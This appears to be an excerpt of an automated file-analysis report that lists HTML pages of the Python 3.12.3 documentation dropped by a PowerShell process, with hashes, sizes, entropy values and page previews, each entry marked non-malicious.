                              SHA-512:1D9A3BC98692C3E34853DEE1495CCD0F4CDC27A6DE151BD7555094238A96247668118A4CBC321A63AAFD845EBB1C1E5762A7F5F7E5442A03231E96CC614D02F4
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Slice Objects" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/slice.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Ellipsis Object:" />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Ellipsis Object:" />..<meta property="og:image:width" content="200" />..<meta property="og:image:height" content="200" />..<meta name="theme-color" content="#3776ab" />.... <title>Slice Objects &#8212; Python 3.12.3 documentation</title><meta name="vie
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (373), with CRLF line terminators
                              Category:dropped
                              Size (bytes):216651
                              Entropy (8bit):4.945773715411537
                              Encrypted:false
                              SSDEEP:768:yqy/AKMx2/eng1tQh+um6iSuW+igUFbLJWe/vSUiFQwxU8W5pILRaxf9tOOSLUkR:yqybMcengbQh9WeSax/pP7lMF764N
                              MD5:FAAFD331831E731EF870F66FC20E3534
                              SHA1:CC747DFC2E1E77BD9CC020153C4085AFEFE6EC22
                              SHA-256:A1ACEA40C3400101897739250C069276C5887C68003D4E4B83D0CE5C5BF8D773
                              SHA-512:6C3DCE897D7EAB4164106CD4D199E308EFF779A721F352A0957D00D82F8C030C2F4B57F551060464BFFB061C4E5A816BEC32DF9903B933E20C8DE9350758CF28
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="C API Stability" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/stable.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Unless documented otherwise, Python.s C API is covered by the Backwards Compatibility Policy, PEP 387. Most changes to it are source-compatible (typically by only adding new API). Changing existing..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Unless documented otherwise, Python.s C API is covered by the Ba
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1496), with CRLF line terminators
                              Category:dropped
                              Size (bytes):113548
                              Entropy (8bit):4.929874763710125
                              Encrypted:false
                              SSDEEP:1536:Lqy4dM1sAxepPqeGe3peWFlefJkrJfLnefJkUFefJkv6efJkNJyefJlMMRMefJlm:WEskEy561l8RaRg
                              MD5:9ABBDC5E3742403F862988733EAD2B3C
                              SHA1:3C0EBF8E7AF992DE4DB58219726EA24058C60BB3
                              SHA-256:1A63D770BB8AA39C9C2F88171C310DE718BC846011CAB7D87AFE10F6C4C6C6A2
                              SHA-512:98FFF4848287986D5A1F844FB5966A88431DCFE7B376F470E3E9C51F0EB648FFA73D0B0CEDEB159243653A868C0EB53A3442D4E8B80ECD7D6EAFD3DF9F2FB861
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Common Object Structures" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/structures.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="There are a large number of structures which are used in the definition of object types for Python. This section describes these structures and how they are used. Base object types and macros: All ..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="There are a large number of structures which are used i
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (898), with CRLF line terminators
                              Category:dropped
                              Size (bytes):79043
                              Entropy (8bit):4.8711381767546555
                              Encrypted:false
                              SSDEEP:1536:zqyxMXJseCJFJ8qjeYHgeCHvwQeBgekAem5e2nerMRMAeRGcRRAeUAoMeUAf91Hk:H7FiPoCQmSg
                              MD5:F4CCB9ED00E2D61D27F2BDD4E434E515
                              SHA1:4681BF68370555AD68AAC84487DA452CF36B3BA7
                              SHA-256:A7E54EFC78C5B315B14FDE70C6EDA1E0719B4F774A17B56E4C84073279CBC10C
                              SHA-512:BEFF0A532F1AED814EE20EDB3C7CFB1300E4D13521A08DEE7F3A5E35822225831514BE5F8FE84F5824F743CD020FAF54585026804F97254DDA74C11C7838B225
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Operating System Utilities" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/sys.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="System Functions: These are utility functions that make functionality from the sys module accessible to C code. They all work with the current interpreter thread.s sys module.s dict, which is conta..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="System Functions: These are utility functions that make
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1180), with CRLF line terminators
                              Category:dropped
                              Size (bytes):52632
                              Entropy (8bit):4.871431107434751
                              Encrypted:false
                              SSDEEP:1536:AqyBMiRerfe4qleCJseKeCJs/JAeP2gJNePnkaSeCJsnneCJsFJleCJsr3NJOeCq:v+g
                              MD5:C684B2237C0B7ADA7F050ED1B7DA16F2
                              SHA1:8295D38C76B771E690720E2D7FE5BB4146480FC8
                              SHA-256:29D23A0F8D5D705337017D034E3F2B5073B1883E8748C9093453593E6FF17DDB
                              SHA-512:3EA61BF79C678430A3E479702CCB7CC4FC1C2B21F246EAD21977DDB5B1249DA3852C6D7B147142784D47CC515075EF8F448D51DBE977A665715237C163DE12AF
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Tuple Objects" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/tuple.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Struct Sequence Objects: Struct sequence objects are the C equivalent of namedtuple() objects, i.e. a sequence whose items can also be accessed through attributes. To create a struct sequence, you ..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Struct Sequence Objects: Struct sequence objects are the C equivalent o
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1555), with CRLF line terminators
                              Category:dropped
                              Size (bytes):87609
                              Entropy (8bit):4.899854761834203
                              Encrypted:false
                              SSDEEP:1536:VqyGMc5eLDeFdeCJlBieCJlGp8e7EGe/JeyJ4e/JeLme/Jeh0eH6kWeU30qeU3eP:U2hu1rNxpNg
                              MD5:03E6320EAD2EDFDB2D1D8D1C435F8249
                              SHA1:3A06EF1520A569D0806F5D18308E8B887753DFD1
                              SHA-256:63299C41D318DB31A58747D432AAA0BB3D4202A1DD1AE862C62B699B82725149
                              SHA-512:D5B3F2142C051E89F986B60DC6A0A6683ED6DD78841D3B055AE468D585EC637904F34D531FAA83851E0127519DBB306B10D5AD2FCB165798DAD88D1D0261DB17
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Type Objects" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/type.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Creating Heap-Allocated Types: The following functions and structs are used to create heap types." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Creating Heap-Allocated Types: The following functions and structs are used to create heap types." />..<meta property="og:image:width" content="200" />..<meta property="og:imag
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1012), with CRLF line terminators
                              Category:dropped
                              Size (bytes):19681
                              Entropy (8bit):4.888008295385176
                              Encrypted:false
                              SSDEEP:384:hAHqklMeG76n2TM+/VJleIVJQEVJHtn/PsxPDYeujeT7enETM076dqEC:SqyJDcM+9JleCJQeJHtn/PspYeReKM01
                              MD5:96DA513204CD642D3BF574532FFEEF2C
                              SHA1:E5D882FC0A4537060A0AC8F0D4C5081765593F37
                              SHA-256:6D657B7383A490E96DAC6F05EAF5F29244F26EBAEB4FECE75590111E1BFB58AB
                              SHA-512:A045107ED428463F94A3142C8DA23DDCC639592625DB3863ACEAFC0306A42B6EA81C3CBF47500C91C6FC2DA5D2A252BA21A583FBA36BF881EEA4CC9306757453
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Objects for Type Hinting" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/typehints.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Various built-in types for type hinting are provided. Currently, two types exist . GenericAlias and Union. Only GenericAlias is exposed to C." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Various built-in types for type hinting are provided. Currently, two types exist . GenericAlias and Union. Only
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (373), with CRLF line terminators
                              Category:dropped
                              Size (bytes):450266
                              Entropy (8bit):4.8522974087846835
                              Encrypted:false
                              SSDEEP:3072:BxK+10bSMw8LXuvWDploSL+esSMwTwSM3ASMWe99tILbg:DYc8ruvWDplo1cTwjAp9tAg
                              MD5:B98E16C9AED455FB6A0FBB3F815FC48D
                              SHA1:D29B1E353F93225F32FFD7D948DF0F6958532D56
                              SHA-256:D107CE6C88B068E3CE2BD45C94EA042AE714676E940464696114FE5430F22B3F
                              SHA-512:52919BF8FD93554FF0DBD731B5E47F9DB5BF69B8B88A9F980024CD803D59D8FCB71D936651C1D558AC59D46A3505502B878B04BA5AEE18661AF50194B756F66D
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Type Objects" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/typeobj.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Perhaps one of the most important structures of the Python object system is the structure that defines a new type: the PyTypeObject structure. Type objects can be handled using any of the PyObject_..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Perhaps one of the most important structures of the Python object syst
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1103), with CRLF line terminators
                              Category:dropped
                              Size (bytes):246175
                              Entropy (8bit):4.845466352850264
                              Encrypted:false
                              SSDEEP:6144:XgpZVb+fuc32xsP4r9L7I5kJwYtYp5fCg:eg
                              MD5:421072F86D15E1CAAA6AE18984F61D5D
                              SHA1:625E1979886209883F9DA8F81C26B704A8B90A75
                              SHA-256:5D0739EBD4E5FBC5E1150F7F464ADABF3275518477CEFA4E6CD52651C03141C2
                              SHA-512:D2D075ECB275FCEA02F58E6D3D169B6749511B33038412561140E8F32A71FC4DD8A1344F765225591E5905FB4C7B3D48BCD03BE1D57F314AE6F19F46FDDDFA4F
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Unicode Objects and Codecs" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/unicode.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Unicode Objects: Since the implementation of PEP 393 in Python 3.3, Unicode objects internally use a variety of representations, in order to allow handling the complete range of Unicode characters ..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Unicode Objects: Since the implementation of PEP 393 in
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (373), with CRLF line terminators
                              Category:dropped
                              Size (bytes):15210
                              Entropy (8bit):4.832592879852463
                              Encrypted:false
                              SSDEEP:192:WErtZReKHqkX1vmKZMwMg0+nFgTMbj0k78MKZMO60anF2TMbgA76dqEC:XHqklccBnaTMXR/n4TMr76dqEC
                              MD5:7B50A2F62CBD22DC5C37A9F5297D4C30
                              SHA1:BA14C7B61EACB945CDD3BDA0C4C421E704D231A5
                              SHA-256:3787A4F4BEB8F2EFC0C8F838F2C530A4C1FE822B52BDB47CBB117377B1BF4A0D
                              SHA-512:CDC4023F2E9B6893A2A9C452E0C014450C3A94FD0213132A0208743E7818C16890D5E693239EC2BE9ED0568FADCA46889435AB87855BD2D84E00617FCCBA63EA
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Utilities" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/utilities.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="The functions in this chapter perform various utility tasks, ranging from helping C code be more portable across platforms, using Python modules from C, and parsing function arguments and construct..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="The functions in this chapter perform various utility tasks, ranging fr
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1996), with CRLF line terminators
                              Category:dropped
                              Size (bytes):87602
                              Entropy (8bit):4.787656783462618
                              Encrypted:false
                              SSDEEP:1536:9qywM/qUceUSSHMYTveUSZHMYyaeYHgeCHvyfeYHgeCHvwJri7eYHgeCHvoi6IeG:OTbtfcxby9g
                              MD5:B48AE78A5C650CCEB1B2212D283E5DA0
                              SHA1:1B81E91073965B724874F19DE539CBC1CC8657D0
                              SHA-256:CE7F7E170F5ECAF6DF8F77AC02CFADF87345DF890AC8694A84484D7C1C8AF395
                              SHA-512:54B64669CFCEE2EA30392D663FBE16A6A961E87929D3033F6DC544EB417898B0D0E93E441A5A92139D7D5957716E497D527A1063C05AB8FDA53D045B0920C7A5
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="The Very High Level Layer" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/veryhigh.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="The functions in this chapter will let you execute Python source code given in a file or a buffer, but they will not let you interact in a more detailed way with the interpreter. Several of these f..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="The functions in this chapter will let you execute Pytho
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1018), with CRLF line terminators
                              Category:dropped
                              Size (bytes):25026
                              Entropy (8bit):4.891239863417193
                              Encrypted:false
                              SSDEEP:768:YlQqyyZcMVaeCJjvZeCJjkkeCJj5JWeCJjeJ9EY1JneCJjeJ9NL6JCeCJdnrJbeX:YlQqyBMVaeCJjvZeCJjkkeCJj5JWeCJM
                              MD5:2AD8969F499B66CEEA60FBA429CB540B
                              SHA1:72B18825F40439BADE47DF7C526FB4A5B9E051B8
                              SHA-256:282BC6B2421078AE2E2D7374B05556FDCC8C410EEC97524DA6E37ACCBA1E18DD
                              SHA-512:081E97E083A42BB0C8936C5E94E0AB81045B0766E1B47FB378ED38270094D09EE7888F7353F9259019540FDC74E21EA6AB22AF03D5736A4110C75ECBD7A1DA86
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Weak Reference Objects" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/weakref.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Python supports weak references as first-class objects. There are two specific object types which directly implement weak references. The first is a simple reference object, and the second acts as ..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Python supports weak references as first-class objects. Ther
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (373), with CRLF line terminators
                              Category:dropped
                              Size (bytes):675259
                              Entropy (8bit):4.856751844355368
                              Encrypted:false
                              SSDEEP:3072:eq1Q1m0dV1UgB1mJkPBeEmcCSmZG00f5rmJv8AdKgGgEsNhWdOF5sBQbxGYubuxC:eyuxpD95eEmcA0BaM+EsNhWdOF5s6eyg
                              MD5:F402DCF60031500AD86915A4C405C838
                              SHA1:02AA786E32EA4CEBCB6A274D5B651EDAA526F613
                              SHA-256:DD5338F76262FD40AABC17A7B83F23944AB7D57D9380AE3FD65D00627CAF11F4
                              SHA-512:91444282340FC1F69DA075777BB9198008A521CE767089AB33462E93D2A7FDFA936B4479E5650770ECCFF8FB6EFD9750A6DD1D1E6DDC354C7F0FD0CE642A3319
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="./">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Python Documentation contents" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/contents.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="What.s New in Python- What.s New In Python 3.12- Summary . Release highlights, New Features- PEP 695: Type Parameter Syntax, PEP 701: Syntactic formalization of f-strings, PEP 684: A Per-Interprete..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="What.s New in Python- What.s New In Python 3.12-
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (373), with CRLF line terminators
                              Category:dropped
                              Size (bytes):12864
                              Entropy (8bit):4.823832589679693
                              Encrypted:false
                              SSDEEP:384:MTpBHtxlbE3Pjn6cMMQjEGP1nYcM676dqEC:MTbtPwrRMMJk3M6764N
                              MD5:B64CC95E76E1344FE6A1F473F0264D1E
                              SHA1:0BCEDA1D62C52149B556D0C48F87A43E155BFFF5
                              SHA-256:72456BDA320FF36A301507C6F5C9E9708AC9BA0520D706041DF3CB8DBD381786
                              SHA-512:D5CE4B7DE72683B5A909180F3E8E475F5110FB54F8B3150A39C2ECAECB1D3461E9FAA20BD7D78DCF3B9FAE6B0FC64A207F1BF80B4C1A29874D0239FD3B0A3744
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="./">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Copyright" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/copyright.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Python and this documentation is: Copyright . 2001-2023 Python Software Foundation. All rights reserved. Copyright . 2000 BeOpen.com. All rights reserved. Copyright . 1995-2000 Corporation for Nati..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Python and this documentation is: Copyright . 2001-2023 Python Software Fo
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (373), with CRLF line terminators
                              Category:dropped
                              Size (bytes):11225
                              Entropy (8bit):4.834028944953228
                              Encrypted:false
                              SSDEEP:192:WQrNKHqkX1vOMGMgTMbn/yXMM6TMbnA76dqEC:qHqkl/OTMby8LTM876dqEC
                              MD5:AA98E4B44174255266A7A00F40D3ED2E
                              SHA1:98E0A6820AA0248EE8B460675483DEA068D6FE18
                              SHA-256:D179527D477CF1DBE985F0D290CB124E2C8DB72ED93C10D028006BCC64F73412
                              SHA-512:0E2DD3BA8C0A5517EA00081A73618F9CBF7F560F5C6F0746EE5313B2DD6D44648F02CB50E0B092446DDC1159CDB6764D48FE26E02C935FAB941DB1FE92AF141D
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Distributing Python Modules" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/distributing/index.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta property="og:image:width" content="200" />..<meta property="og:image:height" content="200" />..<meta name="theme-color" content="#3776ab" />.... <title>Distributing Python Modules &#8212; Python 3.12.3 documentation</title><meta name="viewport" content="width=device-width, initial-scale=1.0">.. .. <link rel="styles
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (373), with CRLF line terminators
                              Category:dropped
                              Size (bytes):11573
                              Entropy (8bit):4.906855752254527
                              Encrypted:false
                              SSDEEP:192:IU5UHtxX1vjNrcMGH+byr5OygkcMGHZ76dqEC:MHtxlVcMVbyr5OytcMs76dqEC
                              MD5:D77806F56E09EB3943877DEA8140B54F
                              SHA1:A4C1A245C50A44E32935D9B337E21D6A069C0F89
                              SHA-256:68F161A7423CB26CA625F43196381D49738EE8719ABCA18242495C9F24BC9366
                              SHA-512:31641273939C424E58E9D833892E9DC9D384E6DD7C39750AD4F2C388B3E8135BF461B26C9AD6C4396E674CB7C028B1F0E2EDD64D61A2BE40ACCC03AE1DB1C745
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="./">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <title>Download &#8212; Python 3.12.3 documentation</title><meta name="viewport" content="width=device-width, initial-scale=1.0">.. .. <link rel="stylesheet" type="text/css" href="_static/pygments.css?v=80d5e7a1" />.. <link rel="stylesheet" type="text/css" href="_static/pydoctheme.css?v=bb723527" />.. <link id="pygments_dark_css" media="(prefers-color-scheme: dark)" rel="stylesheet" type="text/css" href="_static/pygments_dark.css?v=b20cc3f5" />.. .. <script src="_static/documentation_options.js?v=2c828074"></script>.. <script src="_static/doctools.js?v=888ff710"></script>.. <script src="_static/sphinx_highlight.js?v=dc90522c"></script>.. .. <script src="_static/sidebar.js"></script>.. .. <link rel="search" type="application/opensearchdescription+xml".. title="Sea
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (567), with CRLF line terminators
                              Category:dropped
                              Size (bytes):19562
                              Entropy (8bit):4.91258489409245
                              Encrypted:false
                              SSDEEP:384:iHqkl0mptMXn5TMJf23q+jBKVJver1+wIzeIviPmptBhntTMefg76dqEC:2qy3ptmtMl26vJver1XI6MptLZMmg76g
                              MD5:046738F5DA1DD5ADEEC508C034190BD9
                              SHA1:C704874DDF1496497664AF5EF26650AD2110DBC4
                              SHA-256:8A6095CA82F6C83787B64AC36F716360D55071095E7F71EE95C6F6FA6894FA66
                              SHA-512:1C7CA5B739B190EDDEE62E7D3E928A596619B4184342C994ECF6A70F341A99B8BBA95A083908BF4D4D24FC4C8ED96B93A4BBED6F6F5DC0701948F2B7F7AF1D05
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="4. Building C and C++ Extensions" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/extending/building.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="A C extension for CPython is a shared library (e.g. a.so file on Linux,.pyd on Windows), which exports an initialization function. To be importable, the shared library must be available on PYTHONPA..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="A C extension for CPython is a shared library
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (670), with CRLF line terminators
                              Category:dropped
                              Size (bytes):56687
                              Entropy (8bit):4.828816641446644
                              Encrypted:false
                              SSDEEP:1536:KqyhYMj4hYcB13fTNL0YJvyP20RvWnMs764N:UWY+qRdg
                              MD5:156C1761D37930F00A53D75A2C7B21D3
                              SHA1:294E28A82956F15D68CFC75F621772EA48A62EC5
                              SHA-256:03A894BC646595421B43A9DAC8288F8ABA607E37EE62022E94BB8491096C96A6
                              SHA-512:E7B9E515C398894B1CCB8A320D9CAD4670F4B849F2A2BDBFA8BB7AA90D0A140E8562ADE35131DF7EB6BA9BB2BCF9DF5733BF1EA296FCFF26CE6B04685762F51D
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="1. Embedding Python in Another Application" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/extending/embedding.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="The previous chapters discussed how to extend Python, that is, how to extend the functionality of Python by attaching a library of C functions to it. It is also possible to do it the other way arou..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="The previous chapters discussed ho
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (553), with CRLF line terminators
                              Category:dropped
                              Size (bytes):167659
                              Entropy (8bit):4.870286185877593
                              Encrypted:false
                              SSDEEP:1536:rqyUyMM5cGBWeAsiWee4DbrveguqQcRcsEUSShHuFAFd0zLvw13WAX6f6QIQMBxr:uWWeoWeRHH/3Y8QmVOg
                              MD5:70059198CDE4AFF5347513AB3AAB6B03
                              SHA1:204D538BD3BE58C45104EFAAD44CEC331059661A
                              SHA-256:DF067BD9AA8ABAD3C4EA157A8C640475434BC6B150EB7CAB1ABB3E63EB3552BD
                              SHA-512:D3F59649EA8E392AA47A5F384995AC4F90125397D326F19D9A9A89AD070CFDD0BBCEE91E1BD66FDB6AAD5FF1261B777BE428FC8297E293FE090548153A99287C
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="1. Extending Python with C or C++" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/extending/extending.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="It is quite easy to add new built-in modules to Python, if you know how to program in C. Such extension modules can do two things that can.t be done directly in Python: they can implement new built..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="It is quite easy to add new built-in modu
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (373), with CRLF line terminators
                              Category:dropped
                              Size (bytes):24084
                              Entropy (8bit):4.905820111409463
